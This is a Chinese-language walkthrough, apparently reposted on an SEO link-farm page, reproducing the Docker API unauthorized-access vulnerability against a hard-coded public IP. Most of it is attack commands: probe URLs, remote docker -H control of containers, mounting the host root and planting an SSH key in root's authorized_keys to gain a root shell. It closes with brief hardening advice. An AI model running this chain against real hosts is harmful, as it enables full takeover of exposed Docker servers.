当前位置: 首页 > wzjs >正文

网站设计与建设论文品牌网站建设制作

网站设计与建设论文,品牌网站建设制作,外贸网站建设哪家比较好,网站开发合同 下载Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。 什么是 Docker API ? Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,…

Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。

什么是 Docker API ?

Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。

Docker API 未授权访问 

漏洞背景

Docker 守护进程(Docker Daemon)默认监听在 Unix 套接字(`unix:///var/run/docker.sock`)上,但有时为了方便管理,用户会将 Docker API 暴露在 TCP 端口(如 `2375` 或 `2376`)上。如果未正确配置访问控制(如未启用 TLS 加密和认证),攻击者可以直接访问 Docker API,从而完全控制 Docker 主机及其容器。

漏洞复现

1、快速搭建环境

dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375

如果出现如下报错,表明 Docker 守护进程在启动时失败了,原因是 docker 守护进程已经在运行

停止进程,重新执行刚才的命令,环境搭建成功

#1、确认 Docker 守护进程是否正在运行
ps aux | grep dockerd
#2、如果正在运行,先停止它
sudo systemctl stop docker

2、浏览器访问,这样即存在 Docker API 未授权访问漏洞

常见探测路径

http://39.105.123.35:2375/version
http://39.105.123.35:2375/info
http://39.105.123.35:2375/images/json
http://39.105.123.35:2375/containers/json    

3、攻击者便可以远程通过Docker客户端连接,以下为常见操作

#列出所有容器
docker -H 39.105.123.35 ps -a
#查看镜像
docker -H 39.105.123.35 images
#拉取镜像
docker -H 39.105.123.35 pull ubuntu
#停止一个已经运行的容器
docker -H 39.105.123.35 stop c198868f6660
#删除容器
docker -H 39.105.123.35 rm c198868f6660
#进入容器
docker -H 39.105.123.35 exec -it 08d28346ff2d /bin/bash

4、写公钥获取shell

#生成公钥
ssh-keygen -t rsa
#查看生成的公钥
cat /root/.ssh/id_rsa.pub
#运行一个容器挂载宿主机的根目录到容器/mnt目录
docker -H tcp://39.105.123.35 run -it -v /:/mnt --entrypoint /bin/bash nginx
#写入公钥到宿主机
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBA/ZttXREVO+V615UhA2GoQvfmy1JnyJ0eqPnDlAyMxTi9Jahr0IBzqfxk+6hZzdy1a22YwnAOYnSvjkpR8eOYnxb0UoVmXpWMRNqW34v8liJGbc6m1Y5FsottqZfZVRe1UzfvuuOPnUW+oboqT5SvGSH0EXKiQoNFy4fafxHv2mO5E3roac1G1CbA/oPhbnFzFy8qcYjpc1BwSYG60+0IUutX+j2GasXFsieHKyV9U6a9vWLW4OkNUjCnzc/NEbgP/JG7t19NOHrjp4+IA7MGoCfui6G7j8a+PKslJG1hKu/B6frVfWNHVMQkBcmBxZtcmnCxeu+e10YiBtEPi+7 root@master-1" > /mnt/root/.ssh/authorized_keys

5、容器逃逸:连接目标主机获取shell

ssh root@39.105.123.35 -i id_rsa

总结

Docker API 未授权访问是一个高危漏洞,可能导致容器逃逸、数据泄露、恶意软件部署等严重后果。通过正确配置 TLS 加密、访问控制和防火墙规则,可以有效降低风险。同时,建议定期进行安全审计和漏洞扫描,确保 Docker 环境的安全性。 

http://www.dtcms.com/wzjs/416062.html

相关文章:

  • java就是做网站的吗seo站长网怎么下载
  • 海南专业做网站的公司怎么推广网站链接
  • 西安正规网站建设公司谷歌广告投放教程
  • 网站页面和图片设计最新新闻头条
  • 兰州专业做网站南昌seo网站管理
  • 苏州实力做网站公司苏州seo网络推广
  • 手机qq钓鱼网站怎么做西安网站建设平台
  • 基于html5的网站设计毕业论文郑州seo软件
  • wordpress simple tag武汉seo广告推广
  • 优度网站建设竞价托管选择微竞价
  • 网站建设公司代理新品牌进入市场的推广方案
  • 合肥如何做百度的网站推广广告
  • 怎么做pp网站百度上海分公司
  • 做网站版头图片网站的优化
  • 龙华建网站多少钱怎么注册自己公司的网址
  • 国外哪些网站是python做的百度网页版进入
  • 上海网站建设平台济南公司网站推广优化最大的
  • 棕色网站模板深圳网站优化公司
  • 做虾皮网站赚钱吗石家庄网站建设seo
  • vs2017 如何做网站新营销模式有哪些
  • 如何改变wordpress文本的字体颜色搜索引擎排名优化价格
  • 本地网站有什么可以做营销型网站建设总结
  • 政府网站建设与维护网络营销图片
  • 惠州做棋牌网站建设哪家技术好网络广告文案
  • 马云做直销网站吗中国seo谁最厉害
  • solusvm做网站seo友情链接
  • 网站名称可以更换吗网络营销具有哪些特点
  • 中国建设银行招聘信息网站6手机优化大师怎么退款
  • 复制别人网站做第一站广州最新政策
  • fm网站开发竞价托管运营哪家好